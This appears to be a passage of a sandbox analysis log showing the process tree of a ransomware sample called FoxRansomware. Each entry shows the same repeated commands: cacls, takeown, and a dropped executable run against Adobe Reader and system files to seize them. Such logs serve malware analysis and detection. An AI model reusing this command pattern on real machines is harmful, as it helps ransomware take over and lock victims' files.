C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C3⤵PID:1592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"3⤵PID:1512
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MinionPro-Bold.otf" -nobanner3⤵PID:3572
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "MinionPro-Bold.otf" -nobanner4⤵PID:2876
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2704
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""2⤵PID:3432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C3⤵PID:4324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"3⤵
- Modifies file permissions
PID:692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "zy______.pfm" -nobanner3⤵PID:3116
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "zy______.pfm" -nobanner4⤵PID:3452
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""2⤵PID:3536
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C3⤵PID:3484
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"3⤵
- Modifies file permissions
PID:1352
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "brt.fca" -nobanner3⤵PID:436
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "brt.fca" -nobanner4⤵PID:3592
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3524
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""2⤵PID:3748
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C3⤵PID:3664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"3⤵PID:2232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "eng.hyp" -nobanner3⤵PID:3580
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "eng.hyp" -nobanner4⤵PID:3440
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""2⤵PID:3840
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C3⤵PID:5260
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"3⤵PID:3408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "zdingbat.txt" -nobanner3⤵PID:3336
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "zdingbat.txt" -nobanner4⤵PID:5364
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5388
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""2⤵PID:5360
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C3⤵PID:2560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"3⤵PID:5284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "TURKISH.TXT" -nobanner3⤵PID:3304
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "TURKISH.TXT" -nobanner4⤵PID:5420
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:4420
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:5496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
PID:5512
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "watermark.png" -nobanner3⤵PID:2900
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "watermark.png" -nobanner4⤵PID:5464
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:5456
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:5404
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵PID:2456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:700
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:668
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵PID:5944
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵PID:2688
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵PID:5144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "eula.ini" -nobanner3⤵PID:5156
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "eula.ini" -nobanner4⤵PID:5184
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5140
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵PID:5204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵PID:2620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵
- Modifies file permissions
PID:2356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "AcroSign.prc" -nobanner3⤵PID:2628
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "AcroSign.prc" -nobanner4⤵PID:1524
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵PID:2508
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵PID:2004
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵PID:2296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "forms_distributed.gif" -nobanner3⤵PID:3212
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "forms_distributed.gif" -nobanner4⤵PID:2016
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5152
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""2⤵PID:336
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C3⤵PID:3064
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"3⤵PID:2036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "reviews_sent.gif" -nobanner3⤵PID:1876
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "reviews_sent.gif" -nobanner4⤵PID:292
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵PID:2716
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵PID:2924
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵PID:2204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "stop_collection_data.gif" -nobanner3⤵PID:796
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "stop_collection_data.gif" -nobanner4⤵PID:976
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵PID:1892
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵PID:2376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵PID:1096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ReadMe.htm" -nobanner3⤵PID:2784
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "ReadMe.htm" -nobanner4⤵PID:2940
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1400
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵PID:2100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵PID:2484
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵PID:2440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MinionPro-It.otf" -nobanner3⤵PID:2444
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "MinionPro-It.otf" -nobanner4⤵PID:1456
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3020
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵PID:3988
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵PID:936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵PID:2168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ZX______.PFB" -nobanner3⤵PID:2588
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "ZX______.PFB" -nobanner4⤵PID:1308
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2388
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵PID:3392
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵PID:3364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵PID:3256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "brt04.hsp" -nobanner3⤵PID:3200
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "brt04.hsp" -nobanner4⤵PID:1672
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3028
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵PID:3264
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵PID:4012
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵PID:4308
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "engphon.env" -nobanner3⤵PID:2916
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "engphon.env" -nobanner4⤵PID:3512
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵PID:4356
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵PID:2744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵PID:3128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵PID:3096
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵PID:3448
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2396
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵PID:960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵PID:3104
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵PID:2752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CP1250.TXT" -nobanner3⤵PID:3004
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "CP1250.TXT" -nobanner4⤵PID:3144
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""2⤵PID:1984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C3⤵PID:656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"3⤵PID:3152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "AGMGPUOptIn.ini" -nobanner3⤵PID:2640
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "AGMGPUOptIn.ini" -nobanner4⤵PID:2160
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵PID:3388
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵PID:4044
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵PID:3660
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MyriadCAD.otf" -nobanner3⤵PID:1956
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "MyriadCAD.otf" -nobanner4⤵PID:4424
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3508
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""2⤵PID:4040
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C3⤵PID:4696
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"3⤵PID:4020
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "create_form.gif" -nobanner3⤵PID:4624
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "create_form.gif" -nobanner4⤵PID:4720
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""2⤵PID:4580
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C3⤵PID:3352
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"3⤵
- Modifies file permissions
PID:4504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "info.gif" -nobanner3⤵PID:4448
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "info.gif" -nobanner4⤵PID:5776
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5600
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵PID:5740
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C3⤵PID:4556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"3⤵PID:5552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "review_same_reviewers.gif" -nobanner3⤵PID:2584
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "review_same_reviewers.gif" -nobanner4⤵PID:3752
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵PID:3100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C3⤵PID:2532
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"3⤵PID:5620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "trash.gif" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "trash.gif" -nobanner4⤵PID:4440
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""2⤵PID:3244
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C3⤵PID:3892
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"3⤵PID:3852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CourierStd-Bold.otf" -nobanner3⤵PID:4516
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "CourierStd-Bold.otf" -nobanner4⤵PID:3796
-
-
-
